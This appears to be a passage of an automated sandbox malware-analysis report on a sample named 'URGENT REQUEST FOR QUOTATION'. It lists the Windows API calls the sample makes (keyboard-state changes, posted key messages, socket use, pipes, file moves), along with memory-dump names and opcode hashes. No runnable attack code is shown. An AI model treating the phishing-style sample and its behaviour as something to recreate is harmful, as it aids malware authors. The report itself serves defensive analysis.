                                                                                                                      • SetKeyboardState.USER32(?), ref: 0009AF6F
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0009AF9D
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0009AFBC
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 0009AFFD
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0009B020
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                                                                                                      • Instruction ID: 0e13629705a38a930f69e8bbc1b842666b13620a744b83b577f27c1db84b0108
                                                                                                                      • Opcode Fuzzy Hash: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                                                                                                      • Instruction Fuzzy Hash: A951DFA0A047D53DFF368374CD59BBABEE95B06314F088499E1E9458C3C398A8C8E791
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(00000000), ref: 0009AD19
                                                                                                                      • GetKeyboardState.USER32(?), ref: 0009AD2E
                                                                                                                      • SetKeyboardState.USER32(?), ref: 0009AD8F
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0009ADBB
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0009ADD8
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0009AE17
                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0009AE38
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                                                                                                      • Instruction ID: 9a8ce4a993447c4808671d049b3f6fc21ebdc6990d0999d53c26849d815cf942
                                                                                                                      • Opcode Fuzzy Hash: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                                                                                                      • Instruction Fuzzy Hash: A551B6A1A057D53DFF3683348C55BBA7ED95B47300F088589E1D6468C3D694EC84F7A2
                                                                                                                      APIs
                                                                                                                      • GetConsoleCP.KERNEL32(00073CD6,?,?,?,?,?,?,?,?,00065BA3,?,?,00073CD6,?,?), ref: 00065470
                                                                                                                      • __fassign.LIBCMT ref: 000654EB
                                                                                                                      • __fassign.LIBCMT ref: 00065506
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00073CD6,00000005,00000000,00000000), ref: 0006552C
                                                                                                                      • WriteFile.KERNEL32(?,00073CD6,00000000,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 0006554B
                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 00065584
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1324828854-0
                                                                                                                      • Opcode ID: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                                                                                                      • Instruction ID: 903f0b1c0a15e235267dc5133c67e7fa48868f69db26e08795fce502499da723
                                                                                                                      • Opcode Fuzzy Hash: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                                                                                                      • Instruction Fuzzy Hash: 7151B170A007499FDB11CFA8DC59AEEBBFAEF09301F14415AF956E7291D6309A41CB60
                                                                                                                      APIs
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052D4B
                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00052D53
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052DE1
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00052E0C
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052E61
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                      • Opcode ID: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                                                                                                      • Instruction ID: 1e9e557dd8ccd925e56feb4d297d92846c57602b8fae30ac730abbdeca22916c
                                                                                                                      • Opcode Fuzzy Hash: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                                                                                                      • Instruction Fuzzy Hash: 3F419634E002099BCF14DF68C845AEFBBF5BF46356F148155ED146B352DB35AA09CBA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                                                        • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000B1112
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1121
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B11C9
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 000B11F9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2675159561-0
                                                                                                                      • Opcode ID: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                                                                                                      • Instruction ID: c38a939d079140a84f6df5a2b446483fd668b3fb2530a326c63eca0d53f7595f
                                                                                                                      • Opcode Fuzzy Hash: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                                                                                                      • Instruction Fuzzy Hash: DF410331600604AFEB109F18C894FEABBE9EF45324F548559FD19AB292C774ED41CBE0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0009CF45
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009CF7F
                                                                                                                      • _wcslen.LIBCMT ref: 0009D005
                                                                                                                      • _wcslen.LIBCMT ref: 0009D01B
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 0009D061
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 3164238972-1173974218
                                                                                                                      • Opcode ID: ff4fee9d914433058e2bd7089b770d68e739ed31fcdfaaa8d89823dcc392ef84
                                                                                                                      • Instruction ID: 1bf9bec96affcc041397733c8b09d082c3c8390f88500718f4a5f05c53052399
                                                                                                                      • Opcode Fuzzy Hash: ff4fee9d914433058e2bd7089b770d68e739ed31fcdfaaa8d89823dcc392ef84
                                                                                                                      • Instruction Fuzzy Hash: 90414871D451185FEF52EBA4D991EDEB7F9AF44380F1000E6E509EB142EA34AB48DB50
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C2E1C
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E4F
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E84
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000C2EB6
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000C2EE0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2EF1
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000C2F0B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178440468-0
                                                                                                                      • Opcode ID: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                                                                                                      • Instruction ID: fded0992901986a0799d2a031e37539e638682828adea777a45f589bbb35ad06
                                                                                                                      • Opcode Fuzzy Hash: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                                                                                                      • Instruction Fuzzy Hash: BA313530604254AFEB20DF18DC84FA937E0FB9A710F150168F944AFAB2CBB5AC80DB00
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097769
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0009778F
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00097792
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000977B0
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 000977B9
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000977DE
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000977EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: e3325a2bf96d83b7d0f293d7ed02f28d6345a1e148ec3dcfbf75b0865635d006
                                                                                                                      • Instruction ID: 9c6a1ab7598dfa00514371d9415759930cbe89a353e86a6cb9e8f5d5b9f75743
                                                                                                                      • Opcode Fuzzy Hash: e3325a2bf96d83b7d0f293d7ed02f28d6345a1e148ec3dcfbf75b0865635d006
                                                                                                                      • Instruction Fuzzy Hash: 0A21C176608219AFEF10DFE9CC88CBBB3ECEB093647048025FA08DB2A1D674DC419764
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097842
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097868
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0009786B
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0009788C
                                                                                                                      • SysFreeString.OLEAUT32 ref: 00097895
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000978AF
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000978BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: e59d022191cf5f72c43bbfe90f2a7cda5b4b23466221e36401e8bf7422a9884b
                                                                                                                      • Instruction ID: 3ec5d8334ab16ec2b8fe63b24c959483560347105ae335d51537664b38bfd459
                                                                                                                      • Opcode Fuzzy Hash: e59d022191cf5f72c43bbfe90f2a7cda5b4b23466221e36401e8bf7422a9884b
                                                                                                                      • Instruction Fuzzy Hash: 6A219D72608204AFEF14AFA8DC88DBB77ECEB093607148125F919CB2A1DA74DC41DB74
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 000A04F2
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A052E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                      • Opcode ID: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                                                                                                      • Instruction ID: c31d0442ae92182ce482e477d017adb979fc7b9bc52a6f1e67813b4b16bdfb05
                                                                                                                      • Opcode Fuzzy Hash: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                                                                                                      • Instruction Fuzzy Hash: C6217E71900709EBEB209FB9DC44E9A7BF4AF46764F204A19F8A1D62E0D7709950CF20
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A0601
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                      • Opcode ID: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                                                                                                      • Instruction ID: 590ca99bbc5f86c3c49170d3cb99760c2994cfaef040392aa4818c8403bdca32
                                                                                                                      • Opcode Fuzzy Hash: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                                                                                                      • Instruction Fuzzy Hash: 042135755003099BEB209FA9DC44E9A77E8BF96728F200B19F9A1E72D0D7719960CB50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                                                        • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                                                                                                        • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000C4112
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000C411F
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000C412A
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000C4139
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000C4145
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                                                                                                      • Instruction ID: 35d41f8b36995bb076711ad51b869363f17d3618c1969f07ed116030ce73e82c
                                                                                                                      • Opcode Fuzzy Hash: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                                                                                                      • Instruction Fuzzy Hash: 1F1190B2140219BEFF218F64CC86EEB7F9DFF08798F008111FB58A6050C6769C619BA4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0006D7A3: _free.LIBCMT ref: 0006D7CC
                                                                                                                      • _free.LIBCMT ref: 0006D82D
                                                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                                                      • _free.LIBCMT ref: 0006D838
                                                                                                                      • _free.LIBCMT ref: 0006D843
                                                                                                                      • _free.LIBCMT ref: 0006D897
                                                                                                                      • _free.LIBCMT ref: 0006D8A2
                                                                                                                      • _free.LIBCMT ref: 0006D8AD
                                                                                                                      • _free.LIBCMT ref: 0006D8B8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                      • Instruction ID: be38ad5e4142b1e2cb31be17c16b0663645a5ad658ad6024bdd4aee2922864f3
                                                                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                      • Instruction Fuzzy Hash: 57115B71B44B04AADA21BFB0CC47FCF7BDEAF40700F440826B299A6093EA65B5058662
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0009DA74
                                                                                                                      • LoadStringW.USER32(00000000), ref: 0009DA7B
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0009DA91
                                                                                                                      • LoadStringW.USER32(00000000), ref: 0009DA98
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0009DADC
                                                                                                                      Strings
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0009DAB9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message
